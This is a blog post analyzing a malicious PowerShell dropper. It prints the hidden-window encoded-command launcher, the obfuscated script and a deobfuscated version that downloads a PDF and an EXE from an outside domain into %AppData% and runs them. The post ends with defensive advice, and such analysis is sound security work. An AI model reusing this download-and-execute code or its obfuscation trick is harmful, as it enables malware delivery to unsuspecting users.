Dissecting a Malicious PowerShell Script: From Obfuscation to Clarity

0xMX3210xMX321
3 min read

🔓 Decoded Base64

Before the script even begins to run, it’s wrapped inside a Base64-encoded command line that is executed using cmd.exe and PowerShell. Here’s what that looks like:

"C:\Windows\System32\cmd.exe" /c powershell.exe -w h -nop -ep bypass -EncodedCommand <Base64>

When decoded, this base64 string contains the entire obfuscated PowerShell script, like the one we’ll analyze below.

For example, decoding the base64 payload reveals:

$wdV = '';
foreach ($j in 0..($qwZ.Length - 1) | Where-Object { $_ % 2 -eq 0 }) {
    $wdV += [char]([convert]::ToInt32($qwZ.Substring($j,2),16))
};
(& ($wdV.Substring(0,3)) ($wdV.Substring(3)))

This is a common trick used to split hex-encoded shellcode or obfuscated strings, decode them at runtime, and invoke them via dynamic calls like Invoke-Expression

🧩 The Obfuscated Script

Here's the original code:

Invoke-Expression 

function Iux($kuW, $aRo)
{ Set-Content $kuW $aRo -Encoding Byte };

function QYc($kuW)
{ start $kuW };

function okD($qwZ)
{
    $wdV = New-Object (dcU @(137,160,175,105,146,160,157,126,167,164,160,169,175));
    $aRo = $wdV.DownloadData($qwZ);
    return $aRo
};

function dcU($yBM) { ($yBM |%{ [char]($_ - 59) }) -join '' };

function Hfq()
{
    $fhC = $env:AppData + '\';
    $tXz = $env:AppData;
    $Bft = $tXz + '\Report.pdf';

    if (Test-Path $Bft)
    {
        ii $Bft;
    }
    else
    {
        $Aqf = okD (dcU @(163,175,175,171,174,117,106,106,175,173,164,171,171,167,160,161,176,173,180,105,158,170,168,106,161,170,173,168,106,141,160,171,170,173,175,105,171,159,161));
        Iux $Bft $Aqf;
        ii $Bft;
    }

    $vHXfGh = $fhC + '1.exe';

    if (Test-Path $vHXfGh)
    {
        QYc $vHXfGh
    }
    else
    {
        $FgdlcrGG = okD (dcU @(163,175,175,171,174,117,106,106,175,173,164,171,171,167,160,161,176,173,180,105,158,170,168,106,175,170,171,180,170,162,176,173,175,157,164,169,106,108,105,160,179,160));
        Iux $vHXfGh $FgdlcrGG;
        QYc $vHXfGh
    }
}

Hfq;

🕵️‍♂️ Step-by-Step Breakdown

🔧 Obfuscation Function

function dcU($yBM) { ($yBM |%{ [char]($_ - 59) }) -join '' }

This function decodes obfuscated strings by subtracting 59 from each number in an array and converting the result to ASCII characters.

Let’s decode one of the arrays:

dcU @(137,160,175,105,146,160,157,126,167,164,160,169,175)

Subtracting 59 from each:

78,101,116,46,87,101,98,67,108,105,101,110,116

ASCII characters:

Net.WebClient

So this line:

$wdV = New-Object (dcU @(137,...));

becomes:

$wdV = New-Object Net.WebClient

This object will be used to download data from a remote URL.

🌐 Decoding the URLs

Here’s another decoded array:

dcU @(163,175,175,171,174,...))

After decoding, it reveals:

http://tripplefury.com/form/Report[.]pdf

And a second one:

https://tripplefury.com/topyogurtbin/1[.]exe

🧬 What the Script Does (in Plain English)

Let’s piece it all together now.

  1. Defines helper functions:

    • dcU: decode obfuscated strings.

    • okD: download binary data from a URL.

    • Iux: write binary data to disk.

    • QYc: execute a file using start.

  2. Checks if a malicious PDF exists in %AppData%\Report.pdf

    • If it exists: it opens it using ii (alias for Invoke-Item)

    • If not: it downloads the PDF from http://tripplefury/form/Report[.]pdf and saves it as Report.pdf, then opens it

  3. Then checks for %AppData%\1.exe:

    • If it exists: it runs it

    • If not: it downloads it from https://tripplefury.com/topyogurtbin/1[.]exe saves it, and runs it

⚠️ What do we have here

  • Obfuscated string decoding using numeric arrays is a hallmark of malware.

  • Uses Invoke-Expression — another common red flag, as it evaluates strings as code.

  • Downloads and executes binaries from the internet, all in-memory.

  • Hides payloads in the user's AppData directory.

✅ Final Deobfuscated Version

Here is what the script is effectively doing in a human-readable way:

$webClient = New-Object Net.WebClient

function DownloadAndSaveFile($path, $url) {
    $data = $webClient.DownloadData($url)
    Set-Content $path $data -Encoding Byte
}

function RunFile($path) {
    Start-Process $path
}

$appData = $env:AppData
$pdfPath = Join-Path $appData "Report.pdf"
$exePath = Join-Path $appData "1.exe"

if (-not (Test-Path $pdfPath)) {
    DownloadAndSaveFile $pdfPath "http://tripplefury.com/form/Report[.]pdf"
}
Start-Process $pdfPath

if (-not (Test-Path $exePath)) {
    DownloadAndSaveFile $exePath "https://tripplefury.com/topyogurtbin/1[.]exe"
}
Start-Process $exePath

🛡️ Final Thoughts

This script is clearly malicious. It uses several PowerShell tricks to obfuscate its intent, but its goal is simple: download and execute a malicious PDF and EXE on the victim's machine.

If you encounter scripts like this:

  • Never run them on a live machine.

  • Use a sandbox or isolated VM to analyze.

  • Block any suspicious domains.

  • Monitor %AppData% for unauthorized files.

0
Subscribe to my newsletter

Read articles from 0xMX321 directly inside your inbox. Subscribe to the newsletter, and don't miss out.

#cybersecurityMalicious Script

Written by

0xMX321
0xMX321